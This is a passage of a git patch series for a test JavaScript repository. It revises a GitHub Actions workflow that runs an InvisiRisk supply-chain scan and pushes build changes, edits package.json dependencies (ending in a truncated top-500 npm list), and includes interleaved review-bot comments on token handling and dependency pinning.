${{ secrets.GITHUB_TOKEN }} + env: + PSE_DEBUG_FLAG: --alsologtostderr + POLICY_LOG: t + INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} + INVISIRISK_PORTAL: https://app.stage.invisirisk.com/ + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} container: image: node:18-alpine options: --cap-add=NET_ADMIN 
@@ -78,22 +74,21 @@ jobs: matrix: node-version: [18.x] steps: - - env: - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - run: echo $SCAN_ID - - uses: invisirisk/pse-action@v1.0.8 - with: + - env: + SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + run: echo $SCAN_ID + - uses: invisirisk/pse-action@v1.0.8 + with: github-token: ${{ secrets.GITHUB_TOKEN }} SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - - name: Checkout the code - uses: actions/checkout@v3 - - name: Configure Git - run: git config --global --add safe.directory "${GITHUB_WORKSPACE}" - - name: Use Node.js ${{ matrix.node-version }} - uses: actions/setup-node@v3 - with: - node-version: ${{ matrix.node-version }} - - run: npm install - - run: npm ci - - run: npm run build --if-present - - run: npm test + - name: Checkout the code + uses: actions/checkout@v3 + - name: Use Node.js ${{ matrix.node-version }} + uses: actions/setup-node@v3 + with: + node-version: ${{ matrix.node-version }} + - run: npm install + # - run: git push + - run: npm ci + - run: npm run build --if-present + - run: npm test From 5d4edc0b0284a2a06cba67b13ef8b6ace99b148d Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Wed, 29 Jan 2025 15:16:24 +0545 Subject: [PATCH 18/89] Update main.yml --- .github/workflows/main.yml | 30 ++++++++++++++++++++++++++---- 1 file changed, 26 insertions(+), 4 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index b9feea1..51b6ccd 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -4,14 +4,15 @@ on: branches: [ main ] pull_request: branches: [ main ] - + permissions: checks: write - contents: read + contents: write # Ensure contents: write permission for pushing packages: read + env: API_URL: https://app.stage.invisirisk.com - + jobs: create_scan_in_IR_Portal: runs-on: ubuntu-latest 
@@ -28,6 +29,7 @@ jobs: - name: Parse Response id: parseResponse run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT" + ecr_details: runs-on: ubuntu-latest outputs: @@ -52,6 +54,7 @@ jobs: echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT" echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT" echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT" + start_proxy_and_build: runs-on: ubuntu-latest needs: [create_scan_in_IR_Portal, ecr_details] @@ -83,12 +86,31 @@ jobs: SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - name: Checkout the code uses: actions/checkout@v3 + with: + token: ${{ secrets.PAT }} # Use PAT for checkout - name: Use Node.js ${{ matrix.node-version }} uses: actions/setup-node@v3 with: node-version: ${{ matrix.node-version }} - run: npm install - # - run: git push - run: npm ci - run: npm run build --if-present - run: npm test + + # Configure Git + - name: Configure Git + run: | + git config --global user.name "GitHub Actions" + git config --global user.email "actions@github.com" + + # Add and commit changes + - name: Commit changes + run: | + git add . + git commit -m "Automated build and test changes" + + # Push changes + - name: Push changes + run: | + git remote set-url origin https://${{ secrets.PAT }}@github.com/${{ github.repository }}.git + git push origin main From 3bf809e1465cef63274f6d8d2e9340f3fd40915f Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Wed, 29 Jan 2025 15:34:02 +0545 Subject: [PATCH 19/89] Update main.yml --- .github/workflows/main.yml | 93 +++++++++++++++++++++----------------- 1 file changed, 52 insertions(+), 41 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 51b6ccd..f925632 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml 
@@ -1,4 +1,5 @@ name: Build NPM Package + on: push: branches: [ main ] @@ -7,7 +8,7 @@ on: permissions: checks: write - contents: write # Ensure contents: write permission for pushing + contents: write packages: read env: @@ -42,8 +43,8 @@ jobs: id: fetchECRDetails uses: fjogeleit/http-request-action@v1.15.1 with: - url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' - method: 'GET' + url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY}}' + method: 'GET' - name: Decoding VB Token id: parseToken run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT" @@ -64,12 +65,12 @@ jobs: credentials: username: ${{needs.ecr_details.outputs.ecr_username}} password: ${{needs.ecr_details.outputs.ecr_token}} - env: - PSE_DEBUG_FLAG: --alsologtostderr - POLICY_LOG: t - INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} - INVISIRISK_PORTAL: https://app.stage.invisirisk.com/ - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + env: + PSE_DEBUG_FLAG: --alsologtostderr + POLICY_LOG: t + INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} + INVISIRISK_PORTAL: https://app.stage.invisirisk.com/ + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} container: image: node:18-alpine options: --cap-add=NET_ADMIN 
@@ -77,40 +78,50 @@ jobs: matrix: node-version: [18.x] steps: - - env: - SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - run: echo $SCAN_ID - - uses: invisirisk/pse-action@v1.0.8 - with: + - name: Print Scan ID + env: + SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} + run: echo $SCAN_ID + + - name: PSE Action + uses: invisirisk/pse-action@v1.0.8 + with: github-token: ${{ secrets.GITHUB_TOKEN }} SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} - - name: Checkout the code - uses: actions/checkout@v3 - with: - token: ${{ secrets.PAT }} # Use PAT for checkout - - name: Use Node.js ${{ matrix.node-version }} - uses: actions/setup-node@v3 - with: - node-version: ${{ matrix.node-version }} - - run: npm install - - run: npm ci - - run: npm run build --if-present - - run: npm test - # Configure Git - - name: Configure Git - run: | - git config --global user.name "GitHub Actions" - git config --global user.email "actions@github.com" + - name: Checkout code + uses: actions/checkout@v3 + with: + fetch-depth: 0 + token: ${{ secrets.GITHUB_TOKEN }} - # Add and commit changes - - name: Commit changes - run: | - git add . - git commit -m "Automated build and test changes" + - name: Configure Git + run: | + git config --global --add safe.directory "${GITHUB_WORKSPACE}" + git config --global user.name "GitHub Actions" + git config --global user.email "github-actions[bot]@users.noreply.github.com" - # Push changes - - name: Push changes - run: | - git remote set-url origin https://${{ secrets.PAT }}@github.com/${{ github.repository }}.git - git push origin main + - name: Setup Node.js + uses: actions/setup-node@v3 + with: + node-version: ${{ matrix.node-version }} + + - name: Install dependencies + run: | + npm install + npm ci + + - name: Build and test + run: | + npm run build --if-present + npm test + + - name: Commit and push changes + run: | + if [[ -n "$(git status --porcelain)" ]]; then + git add . 
+ git commit -m "chore: automated build and test updates [skip ci]" + git push https://${{ secrets.GITHUB_TOKEN }}@github.com/${{ github.repository }}.git HEAD:${{ github.ref }} + else + echo "No changes to commit" + fi From 82b3b795597714aa65f1301cdd36b7f02e9741eb Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Feb 2025 17:24:09 +0545 Subject: [PATCH 20/89] Update main.yml --- .github/workflows/main.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index f925632..298237e 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -97,6 +97,7 @@ jobs: - name: Configure Git run: | + iptables -t nat -L -v -n git config --global --add safe.directory "${GITHUB_WORKSPACE}" git config --global user.name "GitHub Actions" git config --global user.email "github-actions[bot]@users.noreply.github.com" From 72673f13c341e1aa81eaa470bbec1b9287b6df61 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Feb 2025 17:31:13 +0545 Subject: [PATCH 21/89] Update main.yml --- .github/workflows/main.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 298237e..f925632 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -97,7 +97,6 @@ jobs: - name: Configure Git run: | - iptables -t nat -L -v -n git config --global --add safe.directory "${GITHUB_WORKSPACE}" git config --global user.name "GitHub Actions" git config --global user.email "github-actions[bot]@users.noreply.github.com" From 1faea99d7346b99512f34e721538a44edfea6026 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 18 Feb 2025 15:26:38 +0545 Subject: [PATCH 22/89] Update main.yml --- .github/workflows/main.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index f925632..ba0d8cf 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml 
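Review bot: The new `Commit and push changes` step expands `${{ secrets.GITHUB_TOKEN }}` and `${{ github.ref }}` into the script text before the shell parses it, and the ref is unquoted. `Checkout code` in this hunk already hands the token to `actions/checkout`, so the push can use the configured remote and the runner's own variable instead: `git push origin "HEAD:${GITHUB_REF}"`. `git add .` runs after `npm install` and the build, so any file a dependency's install script wrote into the workspace is committed with `contents: write`; staging the expected paths by name would limit what can reach the branch. If the workflow still runs on `pull_request` at this point, `github.ref` is presumably a merge ref there and the push needs an `if: github.event_name == 'push'` condition.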
@@ -12,7 +12,7 @@ permissions: packages: read env: - API_URL: https://app.stage.invisirisk.com + API_URL: https://app.dev.invisirisk.com jobs: create_scan_in_IR_Portal: @@ -69,7 +69,7 @@ jobs: PSE_DEBUG_FLAG: --alsologtostderr POLICY_LOG: t INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY}} - INVISIRISK_PORTAL: https://app.stage.invisirisk.com/ + INVISIRISK_PORTAL: https://app.dev.invisirisk.com/ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} container: image: node:18-alpine From 0f0cf731dfe768fa371aa0387774ff061ae206b7 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 18 Feb 2025 15:29:47 +0545 Subject: [PATCH 23/89] Update package.json From 9eba47f13d324e5394dc55b535f323d0a88c93fb Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 11:04:02 +0545 Subject: [PATCH 24/89] Update package.json --- package.json | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/package.json b/package.json index e833609..89898f8 100644 --- a/package.json +++ b/package.json @@ -4,7 +4,8 @@ "description": "This is test Javascript repo", "main": "index.js", "scripts": { - "test": "echo \"Test is successful \" && exit 0" + "test": "echo \"Test is successful \" && exit 0", + "run-php": "node -e \"const php = require('node-php'); php('test.php', (err, output) => { if (err) { console.error('PHP Execution Failed:', err); } else { console.log('PHP Output:', output); } });\"" }, "repository": { "type": "git", @@ -19,6 +20,7 @@ "dependencies": { "array-first": "^1.0.2", "array-last": "^1.3.0", - "is-sorted": "^1.0.5" + "is-sorted": "^1.0.5", + "node-php": "^1.0.2" } } From 38ff02369d42bbfba9f30e1780b3edf4d0b66109 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 11:26:25 +0545 Subject: [PATCH 25/89] Update package.json --- package.json | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/package.json b/package.json index 89898f8..a06835e 100644 --- a/package.json +++ b/package.json 
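Review bot: In the `package.json` hunks of the last commit on this line, `node-php` is added with a caret range (`"^1.0.2"`), so each `npm install` in the workflow may resolve a different release, and that package's install scripts run inside the CI job. An exact version, `"node-php": "1.0.2"`, together with a committed lockfile makes the resolved code reviewable; no lockfile change is visible in this commit. The new `run-php` script also passes `test.php` to the package, and nothing in the diffstat adds that file, so it is worth confirming it exists before the script is used.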
@@ -21,6 +21,5 @@ "array-first": "^1.0.2", "array-last": "^1.3.0", "is-sorted": "^1.0.5", - "node-php": "^1.0.2" - } + "php": "1.0.2" } } From fda33c1a5d551d45cccbd964b3028c2322d26a7f Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 11:28:14 +0545 Subject: [PATCH 26/89] Update package.json --- package.json | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/package.json b/package.json index a06835e..cc88330 100644 --- a/package.json +++ b/package.json @@ -4,8 +4,8 @@ "description": "This is test Javascript repo", "main": "index.js", "scripts": { - "test": "echo \"Test is successful \" && exit 0", - "run-php": "node -e \"const php = require('node-php'); php('test.php', (err, output) => { if (err) { console.error('PHP Execution Failed:', err); } else { console.log('PHP Output:', output); } });\"" + "test": "echo \"Test is successful\" && exit 0", + "run-php": "node -e \"const php = require('php'); php.execute('test.php', (err, output) => { if (err) { console.error('PHP Execution Failed:', err); } else { console.log('PHP Output:', output); } });\"" }, "repository": { "type": "git", @@ -21,5 +21,6 @@ "array-first": "^1.0.2", "array-last": "^1.3.0", "is-sorted": "^1.0.5", - "php": "1.0.2" } + "php": "1.0.2" + } } From 4d33f34fcf1bfdf9d2e8286e305e4f47bb164613 Mon Sep 17 00:00:00 2001 From: ir-paras-oli Date: Tue, 4 Mar 2025 11:38:21 +0545 Subject: [PATCH 27/89] Update package.json --- package.json | 522 +++++++++++++++++++++++++++++++++++++++++++++++++-- 1 file changed, 504 insertions(+), 18 deletions(-) diff --git a/package.json b/package.json index cc88330..51b8d3b 100644 --- a/package.json +++ b/package.json 
@@ -1,26 +1,512 @@ { - "name": "test-js-repo", + "name": "top500-npm", "version": "1.0.0", - "description": "This is test Javascript repo", "main": "index.js", "scripts": { - "test": "echo \"Test is successful\" && exit 0", - "run-php": "node -e \"const php = require('php'); php.execute('test.php', (err, output) => { if (err) { console.error('PHP Execution Failed:', err); } else { console.log('PHP Output:', output); } });\"" + "test": "echo \"Error: no test specified\" && exit 1" }, - "repository": { - "type": "git", - "url": "git+https://github.com/ashokkasti/test-js-repo.git" - }, - "author": "Ashok Kasti", - "license": "MIT", - "bugs": { - "url": "https://github.com/ashokkasti/test-js-repo/issues" - }, - "homepage": "https://github.com/ashokkasti/test-js-repo#readme", + "author": "", + "license": "ISC", + "description": "", "dependencies": { - "array-first": "^1.0.2", - "array-last": "^1.3.0", - "is-sorted": "^1.0.5", - "php": "1.0.2" + "@angular/animations": "^19.2.0", + "@angular/cdk": "^19.2.1", + "@angular/common": "^19.2.0", + "@angular/compiler": "^19.2.0", + "@angular/core": "^19.2.0", + "@angular/forms": "^19.2.0", + "@angular/material": "^19.2.1", + "@angular/platform-browser": "^19.2.0", + "@angular/platform-browser-dynamic": "^19.2.0", + "@angular/router": "^19.2.0", + "@apollo/client": "^3.13.1", + "@aws-sdk/client-s3": "^3.758.0", + "@babel/code-frame": "^7.26.2", + "@babel/core": "^7.26.9", + "@babel/generator": "^7.26.9", + "@babel/helper-function-name": "^7.24.7", + "@babel/helper-module-imports": "^7.25.9", + "@babel/helper-module-transforms": "^7.26.0", + "@babel/helper-plugin-utils": "^7.26.5", + "@babel/helper-simple-access": "^7.25.9", + "@babel/helper-split-export-declaration": "^7.24.7", + "@babel/helpers": "^7.26.9", + "@babel/highlight": "^7.25.9", + "@babel/parser": "^7.26.9", + "@babel/preset-env": "^7.26.9", + "@babel/preset-typescript": "^7.26.0", + "@babel/runtime": "^7.26.9", + "@babel/template": "^7.26.9", + "@babel/types": 
"^7.26.9", + "@cubejs-client/core": "^1.0.10", + "@cubejs-client/react": "^1.0.10", + "@emotion/react": "^11.14.0", + "@emotion/styled": "^11.14.0", + "@heroku-cli/color": "^2.0.4", + "@heroku-cli/command": "^11.5.0", + "@heroku-cli/plugin-ps": "^8.1.7", + "@heroku-cli/plugin-ps-exec": "^2.6.2", + "@heroku-cli/plugin-run": "^8.1.4", + "@jridgewell/gen-mapping": "^0.3.8", + "@jridgewell/trace-mapping": "^0.3.25", + "@jupyterlab/application": "^4.3.5", + "@jupyterlab/application-extension": "^4.3.5", + "@jupyterlab/apputils-extension": "^4.3.5", + "@jupyterlab/cell-toolbar-extension": "^4.3.5", + "@jupyterlab/celltags-extension": "^4.3.5", + "@jupyterlab/codemirror-extension": "^4.3.5", + "@jupyterlab/completer-extension": "^4.3.5", + "@jupyterlab/console-extension": "^4.3.5", + "@jupyterlab/coreutils": "^6.3.5", + "@jupyterlab/csvviewer-extension": "^4.3.5", + "@jupyterlab/debugger-extension": "^4.3.5", + "@jupyterlab/docmanager-extension": "^4.3.5", + "@jupyterlab/docprovider-extension": "^3.6.8", + "@jupyterlab/documentsearch-extension": "^4.3.5", + "@jupyterlab/extensionmanager-extension": "^4.3.5", + "@jupyterlab/filebrowser-extension": "^4.3.5", + "@jupyterlab/fileeditor-extension": "^4.3.5", + "@jupyterlab/help-extension": "^4.3.5", + "@jupyterlab/htmlviewer-extension": "^4.3.5", + "@jupyterlab/hub-extension": "^4.3.5", + "@jupyterlab/imageviewer-extension": "^4.3.5", + "@jupyterlab/inspector-extension": "^4.3.5", + "@jupyterlab/javascript-extension": "^4.3.5", + "@jupyterlab/json-extension": "^4.3.5", + "@jupyterlab/launcher-extension": "^4.3.5", + "@jupyterlab/logconsole-extension": "^4.3.5", + "@jupyterlab/mainmenu-extension": "^4.3.5", + "@jupyterlab/markdownviewer-extension": "^4.3.5", + "@jupyterlab/mathjax2-extension": "^4.0.0", + "@jupyterlab/notebook-extension": "^4.3.5", + "@jupyterlab/pdf-extension": "^4.3.5", + "@jupyterlab/rendermime-extension": "^4.3.5", + "@jupyterlab/running-extension": "^4.3.5", + "@jupyterlab/settingeditor-extension": 
"^4.3.5", + "@jupyterlab/shortcuts-extension": "^5.1.5", + "@jupyterlab/statusbar-extension": "^4.3.5", + "@jupyterlab/terminal-extension": "^4.3.5", + "@jupyterlab/theme-dark-extension": "^4.3.5", + "@jupyterlab/theme-light-extension": "^4.3.5", + "@jupyterlab/toc-extension": "^6.3.5", + "@jupyterlab/tooltip-extension": "^4.3.5", + "@jupyterlab/translation-extension": "^4.3.5", + "@jupyterlab/ui-components-extension": "^4.3.5", + "@jupyterlab/vdom-extension": "^3.6.8", + "@jupyterlab/vega5-extension": "^4.3.5", + "@material-ui/core": "^4.12.4", + "@material-ui/icons": "^4.11.3", + "@mui/icons-material": "^6.4.6", + "@mui/material": "^6.4.6", + "@nestjs/common": "^11.0.11", + "@nestjs/core": "^11.0.11", + "@nestjs/platform-express": "^11.0.11", + "@oclif/command": "^1.8.36", + "@oclif/config": "^1.18.17", + "@oclif/plugin-commands": "^4.1.21", + "@oclif/plugin-help": "^6.2.26", + "@oclif/plugin-legacy": "^2.0.22", + "@oclif/plugin-not-found": "^3.2.44", + "@oclif/plugin-plugins": "^5.4.34", + "@oclif/plugin-update": "^4.6.33", + "@oclif/plugin-warn-if-update-available": "^3.1.35", + "@oclif/plugin-which": "^3.2.32", + "@reduxjs/toolkit": "^2.6.0", + "@salesforce-ux/design-system": "^2.26.2", + "@salesforce-ux/icons": "^10.12.1", + "@salesforce/design-system-react": "^0.10.63", + "@sentry/integrations": "^7.114.0", + "@sentry/node": "^9.3.0", + "@sentry/react": "^9.3.0", + "@sentry/tracing": "^7.120.3", + "@susy-js/lodash.merge": "^4.6.6", + "@swc/core": "^1.11.5", + "@testing-library/jest-dom": "^6.6.3", + "@testing-library/react": "^16.2.0", + "@testing-library/user-event": "^14.6.1", + "@types/express": "^5.0.0", + "@types/jest": "^29.5.14", + "@types/lodash": "^4.17.16", + "@types/node": "^22.13.8", + "@types/react": "^19.0.10", + "@types/react-dom": "^19.0.4", + "@types/uuid": "^10.0.0", + "@types/yargs": "^17.0.33", + "@typescript-eslint/eslint-plugin": "^8.25.0", + "@typescript-eslint/parser": "^8.25.0", + "accepts": "^1.3.8", + "acorn": "^8.14.0", + 
"agent-base": "^7.1.3", + "ajv": "^8.17.1", + "ansi-escapes": "^7.0.0", + "ansi-regex": "^6.1.0", + "ansi-styles": "^6.2.1", + "anymatch": "^3.1.3", + "argparse": "^2.0.1", + "array-flatten": "^3.0.0", + "array-union": "^3.0.1", + "async": "^3.2.6", + "autoprefixer": "^10.4.20", + "aws-cdk-lib": "^2.181.1", + "aws-sdk": "^2.1692.0", + "axios": "^1.8.1", + "babel-loader": "^10.0.0", + "babel-polyfill": "^6.26.0", + "balanced-match": "^3.0.1", + "bcrypt-nodejs": "^0.0.3", + "binary-extensions": "^3.0.0", + "bluebird": "^3.7.2", + "body-parser": "^1.20.3", + "bootstrap": "^5.3.3", + "brace-expansion": "^4.0.0", + "braces": "^3.0.3", + "browserslist": "^4.24.4", + "buffer": "^6.0.3", + "buffer-from": "^1.1.2", + "bytes": "^3.1.2", + "call-bind": "^1.0.8", + "callsites": "^4.2.0", + "camelcase": "^8.0.0", + "chai": "^5.2.0", + "chai-as-promised": "^8.0.1", + "chalk": "^5.4.1", + "chart.js": "^4.4.8", + "child-process-promise": "^2.2.1", + "chownr": "^3.0.0", + "ci-info": "^4.1.0", + "classnames": "^2.5.1", + "cli-progress-bar": "^1.0.1", + "cliui": "^8.0.1", + "color-convert": "^3.0.1", + "color-name": "^2.0.0", + "combined-stream": "^1.0.8", + "commander": "^13.1.0", + "compression": "^1.8.0", + "concat-map": "^0.0.2", + "config": "^3.3.12", + "constructs": "^10.4.2", + "content-type": "^1.0.5", + "convert-source-map": "^2.0.0", + "cookie": "^1.0.2", + "cookie-parser": "^1.4.7", + "core-js": "^3.41.0", + "core-util-is": "^1.0.3", + "cors": "^2.8.5", + "cross-env": "^7.0.3", + "cross-spawn": "^7.0.6", + "crypto-js": "^4.2.0", + "css-loader": "^7.1.2", + "csurf": "^1.11.0", + "cypress": "^14.1.0", + "d3": "^7.9.0", + "d3-flame-graph": "^4.1.3", + "d3-selection": "^3.0.0", + "dagre-d3": "^0.6.4", + "date-fns": "^4.1.0", + "dayjs": "^1.11.13", + "dd-trace": "^5.40.0", + "debug": "^4.4.0", + "deep-is": "^0.1.4", + "define-properties": "^1.2.1", + "define-property": "^2.0.2", + "delayed-stream": "^1.0.0", + "depd": "^2.0.0", + "dependable": "^1.1.0", + "destroy": "^1.2.0", + 
"doctrine": "^3.0.0", + "domelementtype": "^2.3.0", + "dompurify": "^3.2.4", + "dont-sniff-mimetype": "^1.1.0", + "dotenv": "^16.4.7", + "ejs": "^3.1.10", + "electron-to-chromium": "^1.5.109", + "emoji-regex": "^10.4.0", + "end-of-stream": "^1.4.4", + "enhanced-resolve": "^5.18.1", + "entities": "^6.0.0", + "error-ex": "^1.3.2", + "es-abstract": "^1.23.9", + "escape-string-regexp": "^5.0.0", + "eslint": "^9.21.0", + "eslint-config-prettier": "^10.0.2", + "eslint-plugin-import": "^2.31.0", + "eslint-plugin-jsx-a11y": "^6.10.2", + "eslint-plugin-prettier": "^5.2.3", + "eslint-plugin-react": "^7.37.4", + "eslint-plugin-react-hooks": "^5.2.0", + "eslint-scope": "^8.2.0", + "eslint-visitor-keys": "^4.2.0", + "esprima": "^4.0.1", + "esrecurse": "^4.3.0", + "estraverse": "^5.3.0", + "execa": "^9.5.2", + "express": "^4.21.2", + "express-session": "^1.18.1", + "extend-shallow": "^3.0.2", + "file-exists": "^5.0.1", + "file-saver": "^2.0.5", + "fill-range": "^7.1.1", + "finalhandler": "^1.3.1", + "find-cache-dir": "^5.0.0", + "find-up": "^7.0.0", + "font-awesome": "^4.7.0", + "forever": "^4.0.3", + "form-data": "^4.0.2", + "formik": "^2.4.6", + "fs-extra": "^11.3.0", + "fs-extra-promise": "^1.0.1", + "fs.realpath": "^1.0.0", + "function-bind": "^1.1.2", + "get-caller-file": "^2.0.5", + "get-intrinsic": "^1.3.0", + "get-stream": "^9.0.1", + "glob": "^11.0.1", + "glob-parent": "^6.0.2", + "globals": "^16.0.0", + "graceful-fs": "^4.2.11", + "graphql": "^16.10.0", + "graphql-tag": "^2.12.6", + "has": "^1.0.4", + "has-flag": "^5.0.1", + "has-symbols": "^1.1.0", + "has-value": "^2.0.2", + "has-values": "^2.0.1", + "helmet": "^8.0.0", + "history": "^5.3.0", + "html-to-text": "^9.0.5", + "http-call": "^5.3.0", + "http-errors": "^2.0.0", + "http-status-codes": "^2.3.0", + "husky": "^9.1.7", + "i18next": "^24.2.2", + "iconv-lite": "^0.6.3", + "ieee754": "^1.2.1", + "ignore": "^7.0.3", + "immer": "^10.1.1", + "import-fresh": "^3.3.1", + "imurmurhash": "^0.1.4", + "indent-string": 
"^5.0.0", + "inflight": "^1.0.6", + "inherits": "^2.0.4", + "ioredis": "^5.5.0", + "ipaddr.js": "^2.2.0", + "is-accessor-descriptor": "^3.0.5", + "is-arrayish": "^0.3.2", + "is-callable": "^1.2.7", + "is-core-module": "^2.16.1", + "is-data-descriptor": "^2.1.3", + "is-date-object": "^1.1.0", + "is-descriptor": "^3.1.1", + "is-extendable": "^1.0.1", + "is-extglob": "^2.1.1", + "is-fullwidth-code-point": "^5.0.0", + "is-glob": "^4.0.3", + "is-number": "^7.0.0", + "is-plain-obj": "^4.1.0", + "is-regex": "^1.2.1", + "is-stream": "^4.0.1", + "is-symbol": "^1.1.1", + "is-wsl": "^3.1.0", + "isarray": "^2.0.5", + "isexe": "^3.1.1", + "isobject": "^4.0.0", + "jest": "^29.7.0", + "jest-worker": "^29.7.0", + "joi": "^17.13.3", + "jquery": "^3.7.1", + "jqueryui": "^1.11.1", + "js-cookie": "^3.0.5", + "js-tokens": "^9.0.1", + "js-yaml": "^4.1.0", + "jsesc": "^3.1.0", + "json-schema-traverse": "^1.0.0", + "json-stable-stringify": "^1.2.1", + "json5": "^2.2.3", + "jsonschema": "^1.5.0", + "jsonwebtoken": "^9.0.2", + "junit": "^1.4.9", + "jwt-decode": "^4.0.0", + "kind-of": "^6.0.3", + "knex": "^3.1.0", + "lint-staged": "^15.4.3", + "loader-utils": "^3.3.1", + "locate-path": "^7.2.0", + "lodash": "^4.17.21", + "lru-cache": "^11.0.2", + "luxon": "^3.5.0", + "lwc": "^8.14.0", + "make-dir": "^5.0.0", + "marked": "^15.0.7", + "mathjs": "^14.3.0", + "memoizee": "^0.4.17", + "micromatch": "^4.0.8", + "mime": "^4.0.6", + "mime-db": "^1.53.0", + "mime-types": "^2.1.35", + "mimic-fn": "^5.0.0", + "mini-css-extract-plugin": "^2.9.2", + "minimatch": "^10.0.1", + "minimist": "^1.2.8", + "mkdirp": "^3.0.1", + "mocha": "^11.1.0", + "moment": "^2.30.1", + "moment-timezone": "^0.5.47", + "mongodb": "^6.14.0", + "morgan": "^1.10.0", + "ms": "^2.1.3", + "mysql": "^2.18.1", + "needle": "^3.3.1", + "negotiator": "^1.0.0", + "netrc-parser": "^3.1.6", + "newrelic": "^12.14.0", + "next": "^15.2.0", + "node-esapi": "^0.0.1", + "node-fetch": "^3.3.2", + "node-releases": "^2.0.19", + "nodemon": "^3.1.9", + 
"nopt": "^8.1.0", + "normalize-path": "^3.0.0", + "npm-run-path": "^6.0.0", + "object-inspect": "^1.13.4", + "object-keys": "^1.1.1", + "object.assign": "^4.1.7", + "oboe": "^2.1.7", + "once": "^1.4.0", + "onetime": "^7.0.0", + "optionator": "^0.9.4", + "p-limit": "^6.2.0", + "p-locate": "^6.0.0", + "p-map": "^7.0.3", + "p-try": "^3.0.0", + "papaparse": "^5.5.2", + "parse-json": "^8.1.0", + "parse5": "^7.2.1", + "passport": "^0.7.0", + "path-exists": "^5.0.0", + "path-is-absolute": "^2.0.0", + "path-key": "^4.0.0", + "path-parse": "^1.0.7", + "path-type": "^6.0.0", + "pg": "^8.13.3", + "picocolors": "^1.1.1", + "picomatch": "^4.0.2", + "pify": "^6.1.0", + "pino": "^9.6.0", + "pkg-dir": "^8.0.0", + "please-upgrade-node": "^3.2.0", + "postcss": "^8.5.3", + "postcss-selector-parser": "^7.1.0", + "postmonger": "^0.0.16", + "prettier": "^3.5.3", + "pretty-format": "^29.7.0", + "process-nextick-args": "^2.0.1", + "prom-client": "^15.1.3", + "prop-types": "^15.8.1", + "proxy-addr": "^2.0.7", + "psl": "^1.15.0", + "pump": "^3.0.2", + "punycode": "^2.3.1", + "puppeteer": "^24.3.0", + "qs": "^6.14.0", + "query-string": "^9.1.1", + "raw-body": "^3.0.0", + "react": "^19.0.0", + "react-bootstrap": "^2.10.9", + "react-dom": "^19.0.0", + "react-helmet": "^6.1.0", + "react-hook-form": "^7.54.2", + "react-i18next": "^15.4.1", + "react-intl": "^7.1.6", + "react-query": "^3.39.3", + "react-redux": "^9.2.0", + "react-router": "^7.2.0", + "react-router-dom": "^7.2.0", + "react-scripts": "^5.0.1", + "react-select": "^5.10.0", + "reactable": "^1.1.0", + "readable-stream": "^4.7.0", + "readdirp": "^4.1.2", + "recharts": "^2.15.1", + "redis": "^4.7.0", + "redux": "^5.0.1", + "redux-thunk": "^3.1.0", + "reflect-metadata": "^0.2.2", + "regenerator-runtime": "^0.14.1", + "request": "^2.88.2", + "request-promise": "^4.2.6", + "resolve": "^1.22.10", + "resolve-from": "^5.0.0", + "rimraf": "^6.0.1", + "rxjs": "^7.8.2", + "safe-buffer": "^5.2.1", + "safer-buffer": "^2.1.2", + "sass": "^1.85.1", + 
